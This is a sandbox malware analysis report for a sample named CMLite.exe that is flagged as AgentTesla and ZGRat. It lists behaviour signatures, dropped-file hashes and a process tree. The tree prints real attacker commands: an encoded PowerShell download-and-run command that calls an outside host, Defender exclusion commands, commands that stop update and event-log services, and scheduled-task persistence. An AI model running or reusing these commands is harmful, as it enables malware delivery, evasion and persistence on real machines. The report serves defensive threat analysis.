Overview

overview

10

Static

static

1

CMLite.exe

windows7-x64

10

CMLite.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    111s
  • max time network
    113s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    10-05-2024 20:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CMLite.exe

  • Size

    2.3MB

  • MD5

    616a65eb66de1b0218401d55bc36e8b8

  • SHA1

    3c61c3844590cdffe11218fb8f5bb13a5555d52e

  • SHA256

    35bbb997958723a543c906b2c014da4e73d28b935260a58a46c5c09d2920bb89

  • SHA512

    c77ace0d3a8a9dfb5d18e5099b2afef1ad5bc0add6a947fcf1efc8c32be2f8ccab7405bccc8f7514b4f2a884a4c01969e097bf87e724b60effca333628e03004

  • SSDEEP

    49152:C3Iq8lWFDP5E73BgWmU2p77Qqs10y3SryMqf:CMeDPYCWmn5QfbSryMqf

Score
10/10
agentteslazgratevasionexecutionkeyloggerpersistenceratspywarestealertrojan

Malware Config

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect ZGRat V1 4 IoCs
  • Process spawned unexpected child process 15 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • AgentTesla payload 1 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

    execution
  • Creates new service(s) 2 TTPs
    persistenceexecution
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
    evasionexecution
  • Executes dropped EXE 9 IoCs
  • Loads dropped DLL 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 15 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\CMLite.exe
    "C:\Users\Admin\AppData\Local\Temp\CMLite.exe"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:824
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAcwBrACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABpAGcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBtAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABzAHcAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcALAAgADwAIwBhAHoAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAdgBqACMAPgAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AHAAdgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQApADwAIwBxAGgAbgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AcgBlAG0AbwB0AGUALwBjAG0ASAB5AHAAZQByAHMAdQByAHIAbwBnAGEAdABlAHMAYQB2AGUAcwBEAGgAYwBwAC4AZQB4AGUAJwAsACAAPAAjAGYAbQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAawBtAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYgBzAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBtAEgAeQBwAGUAcgBzAHUAcgByAG8AZwBhAHQAZQBzAGEAdgBlAHMARABoAGMAcAAuAGUAeABlACcAKQApADwAIwB5AHgAZwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrAHIAZQBhAGQAaQBuAGcAMgAwADIANAAuAG4AZQB0AC8AbQAvAGMAbwBuAGgAbwBzAHQAZwBtAC4AZQB4AGUAJwAsACAAPAAjAGMAcgBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeABzAGgAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB4AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABnAG0ALgBlAHgAZQAnACkAKQA8ACMAeQBqAHAAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAeQBpAHYAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACgAJABwAHcAZAApAC4AcABhAHQAaAAgADwAIwB6AG0AYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDAE0ATABpAHQAZQBJAG4AcwB0AGEAbABsAGUAcgAuAGUAeABlACcAKQA8ACMAeQBpAGoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBiAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGwAeQBwACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbQBIAHkAcABlAHIAcwB1AHIAcgBvAGcAYQB0AGUAcwBhAHYAZQBzAEQAaABjAHAALgBlAHgAZQAnACkAPAAjAGcAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAG0AdQBtACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHEAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBjAG8AbgBoAG8AcwB0AGcAbQAuAGUAeABlACcAKQA8ACMAZwB5AHcAIwA+AA=="
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2536
      • C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates system info in registry
        PID:2968
      • C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        "C:\Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2812
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1372
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c ""C:\BridgeChainserverwinDriver\SQvq6Fq.bat" "
            5⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
              "C:\BridgeChainserverwinDriver/cmHypersurrogatesavesDhcp.exe"
              6⤵
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1896
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Media Player\fr-FR\services.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2728
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Downloads\winlogon.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2696
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmHypersurrogatesavesDhcp.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2724
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Temp\Crashpad\explorer.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2668
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\cmd.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2480
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\3YlK7Fn5Xo.bat"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:2500
                • C:\Windows\system32\chcp.com
                  chcp 65001
                  8⤵
                    PID:2852
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    8⤵
                    • Runs ping.exe
                    PID:1548
                  • C:\Program Files\Windows Media Player\fr-FR\services.exe
                    "C:\Program Files\Windows Media Player\fr-FR\services.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2600
        • C:\Users\Admin\AppData\Roaming\conhostgm.exe
          "C:\Users\Admin\AppData\Roaming\conhostgm.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Users\Admin\AppData\Roaming\.conhostgm.exe
            "C:\Users\Admin\AppData\Roaming\.conhostgm.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in System32 directory
            PID:1136
            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Drops file in System32 directory
              • Suspicious use of AdjustPrivilegeToken
              PID:2840
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2416
              • C:\Windows\system32\wusa.exe
                wusa /uninstall /kb:890830 /quiet /norestart
                6⤵
                • Drops file in Windows directory
                PID:1140
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop UsoSvc
              5⤵
              • Launches sc.exe
              PID:2312
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop WaaSMedicSvc
              5⤵
              • Launches sc.exe
              PID:1620
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop wuauserv
              5⤵
              • Launches sc.exe
              PID:1188
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop bits
              5⤵
              • Launches sc.exe
              PID:1312
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop dosvc
              5⤵
              • Launches sc.exe
              PID:2940
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:948
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2880
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:880
            • C:\Windows\system32\powercfg.exe
              C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2920
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe delete "driverupdate"
              5⤵
              • Launches sc.exe
              PID:2592
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
              5⤵
              • Launches sc.exe
              PID:2508
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe stop eventlog
              5⤵
              • Launches sc.exe
              PID:2748
            • C:\Windows\system32\sc.exe
              C:\Windows\system32\sc.exe start "driverupdate"
              5⤵
              • Launches sc.exe
              PID:2060
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Media Player\fr-FR\services.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:1464
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\services.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2920
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Media Player\fr-FR\services.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:108
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Downloads\winlogon.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:1760
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\Default\Downloads\winlogon.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:1824
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Downloads\winlogon.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2936
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmHypersurrogatesavesDhcpc" /sc MINUTE /mo 12 /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmHypersurrogatesavesDhcp.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:1604
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmHypersurrogatesavesDhcp" /sc ONLOGON /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmHypersurrogatesavesDhcp.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:1704
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmHypersurrogatesavesDhcpc" /sc MINUTE /mo 13 /tr "'C:\Recovery\d6b272a2-8f1b-11ee-9e28-7ed9061e9c39\cmHypersurrogatesavesDhcp.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2308
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Windows\Temp\Crashpad\explorer.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2336
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\Temp\Crashpad\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2320
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Windows\Temp\Crashpad\explorer.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2200
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Downloads\cmd.exe'" /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2660
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Public\Downloads\cmd.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2908
    • C:\Windows\system32\schtasks.exe
      schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 7 /tr "'C:\Users\Public\Downloads\cmd.exe'" /rl HIGHEST /f
      1⤵
      • Process spawned unexpected child process
      • Creates scheduled task(s)
      PID:2576
    • C:\ProgramData\VC_redist.x64.exe
      C:\ProgramData\VC_redist.x64.exe
      1⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      PID:1900
      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Suspicious use of AdjustPrivilegeToken
        PID:2808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2412
        • C:\Windows\system32\wusa.exe
          wusa /uninstall /kb:890830 /quiet /norestart
          3⤵
          • Drops file in Windows directory
          PID:2916
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop UsoSvc
        2⤵
        • Launches sc.exe
        PID:1540
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        2⤵
        • Launches sc.exe
        PID:1692
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop wuauserv
        2⤵
        • Launches sc.exe
        PID:2448
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop bits
        2⤵
        • Launches sc.exe
        PID:1212
      • C:\Windows\system32\sc.exe
        C:\Windows\system32\sc.exe stop dosvc
        2⤵
        • Launches sc.exe
        PID:2308
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1652
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:320
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\system32\powercfg.exe
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2520
      • C:\Windows\system32\conhost.exe
        C:\Windows\system32\conhost.exe
        2⤵
          PID:1164

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\BridgeChainserverwinDriver\SQvq6Fq.bat
        Filesize

        102B

        MD5

        96b489ae2503e2ab4e18a2b584fad475

        SHA1

        873daaaec0a6978a3f6e9a99bf66dfa388ea8321

        SHA256

        6c5ade02c3d706cf54d5d7e0ce525034179ac3f80866caf615e265737df6f1c1

        SHA512

        9ac4ba04e5bc86aced9fbab34b2564bbd59ff249598a4e4501105ee6a443b0467b2995fdeef49cffd84ca106b6256f21a26e243d4396f0a394c2110b7fe54d52

        Download Submit

      • C:\BridgeChainserverwinDriver\lWPzR1COw6cbe1Bc3dVzDZxdAD6Pz4jxoWgNKIOPHWBjqt3tHIP3Cr.vbe
        Filesize

        211B

        MD5

        d4f337599faff375fa8c61471ad7048c

        SHA1

        7bc11cc1588e072698090393875dcf856b874ba1

        SHA256

        10d502ba0315c5fc07e317116ff1dda94b59fe8f6381d75a319a2c7e0891e07a

        SHA512

        6291806cc91e9162a878973b0b02186869fdbb6457fdbf15d6f7b2e538638b3026b66dc5443c8dde0e79d33483aea18e363e711e788c6dab911678bd19a40899

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
        Filesize

        68KB

        MD5

        29f65ba8e88c063813cc50a4ea544e93

        SHA1

        05a7040d5c127e68c25d81cc51271ffb8bef3568

        SHA256

        1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

        SHA512

        e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        1KB

        MD5

        a266bb7dcc38a562631361bbf61dd11b

        SHA1

        3b1efd3a66ea28b16697394703a72ca340a05bd5

        SHA256

        df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

        SHA512

        0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

        Download Submit

      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
        Filesize

        242B

        MD5

        ec9bbe9c6dca624d3ec2352f127e0e2d

        SHA1

        319b196a96a53fcab91cb7965586a76d4af19502

        SHA256

        38a00386d200ee6bddd8224455e9162cb70d147401e1b57bf7ef1ea892cbed85

        SHA512

        1e32291fdbbda65e43e75088ab1d48db1fb06a3cd69ad485b64c09de1f84495d41c0e164013a3b9c345d2d593fbb4e9bf4801255681b24892789be6db928cab3

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\3YlK7Fn5Xo.bat
        Filesize

        184B

        MD5

        1b74df6e3efd27e094999c0b56134a49

        SHA1

        7e1e7821abdc82da923ad2579c42500b6af97959

        SHA256

        bf0e364150dcd94e96ed71885b0b43e76753b57236eb397f029e874a43a08bb4

        SHA512

        e88ec8cf7e3e8fbcf14c412251ad0035c22d3ba3483bca2392b610b30f838a68972083e9bcb271cf10f03dd7cd2de4190b28a09e2201831e5d2341c3513d4f00

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\Tar2522.tmp
        Filesize

        177KB

        MD5

        435a9ac180383f9fa094131b173a2f7b

        SHA1

        76944ea657a9db94f9a4bef38f88c46ed4166983

        SHA256

        67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

        SHA512

        1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1KLFADSSZY48C390PKRM.temp
        Filesize

        7KB

        MD5

        b9a260dd2b96cb914f2c066fbff0f562

        SHA1

        df398ded3e6a589174c2c11418c61310dd287efa

        SHA256

        5f653c5e88119d97836661177633f848bb5163b070ab156f0107e74d34308d3a

        SHA512

        926da93d94c9914a19c7d79fc1d1708bed93cb7b66bb4cdaa736d753ae2969ab199d09fa78bab248f097276dd3021de8b08c341487220b43be85d14e05ddddc7

        Download Submit

      • \BridgeChainserverwinDriver\cmHypersurrogatesavesDhcp.exe
        Filesize

        2.0MB

        MD5

        2eea3122b5e1a714d45f7718ce3a25e3

        SHA1

        b6d45f1124bf85fd571e6ea9417104b51d539456

        SHA256

        bb8b517b159e137ba92f0ab246630ff36e20fe350056afa75be751fedd634b55

        SHA512

        13c6eedaf9a582d6c02ad478e24a5ae7d66c1195677e8d42541355807336dba09ce736e4539bfe04ce3b98e40aa52c54f457eda6a8b5fd547b784d7c6c89258e

        Download Submit

      • \Users\Admin\AppData\Local\Temp\CMLiteInstaller.exe
        Filesize

        977KB

        MD5

        02ea34533272f916fb52990a45917913

        SHA1

        bd68a7c84b7d7a65ab19419ddf6a2a2b44fda0a4

        SHA256

        6dd45a770648da5f5996ac7b28f604493b44f8b1ba7458cf60d3a1ab7cf18590

        SHA512

        352521214ed922b0e3331559d0c6b2af0fc55e4b4077dcf83dbeec08a8f59820c98bbbd795cdd8e2430c835ba7fbb6b19c34572762c7cf6359de05b99ef019a7

        Download Submit

      • \Users\Admin\AppData\Roaming\cmHypersurrogatesavesDhcp.exe
        Filesize

        2.3MB

        MD5

        322944acd00186c743f6ff097c0db0c6

        SHA1

        a330f89db2367088048022b74be3a2cb67853a61

        SHA256

        aed6159dc2a264fd2fb0c0d20d7816c26741e1fcd517b06ed4726a8ff1e32d5a

        SHA512

        bf1a98a40a94ea180c01dd90610ee434fd555592ca2e21078330493cd4f8b1f401ae3a5bdf1c0beb4d2181b135760a66ac2c73881d7611f57ef6ceba4fa3e7e3

        Download Submit

      • \Users\Admin\AppData\Roaming\conhostgm.exe
        Filesize

        2.9MB

        MD5

        316fa77cc45d0802155448d648b417b4

        SHA1

        c60be59c3df582030f3bbbf7c93e3f6110a38c82

        SHA256

        dd248b4df3e5b9eac86bbe9fc6f7ef17b0d75738b601267b214a825783d0a2a1

        SHA512

        4f1a4b71bc0d18dd6210c7b55736e2c43cf90f7ed700061a775ceecade3ef2b88c0e122769c5570e5bb2b8453deab6d5ff50ab73ff0fbb1cb9b3475be76c4da9

        Download Submit

      • memory/824-2-0x0000000000400000-0x0000000000DAC000-memory.dmp

        Filesize

        9.7MB

        Download

      • memory/824-3-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/824-0-0x0000000000400000-0x0000000000DAC000-memory.dmp

        Filesize

        9.7MB

        Download

      • memory/824-1-0x000000007EBD0000-0x000000007EFA1000-memory.dmp

        Filesize

        3.8MB

        Download

      • memory/1164-243-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1164-248-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1164-244-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1164-245-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1164-246-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1164-242-0x0000000140000000-0x000000014000E000-memory.dmp

        Filesize

        56KB

        Download

      • memory/1896-168-0x0000000000540000-0x000000000055C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/1896-172-0x0000000000520000-0x000000000052E000-memory.dmp

        Filesize

        56KB

        Download

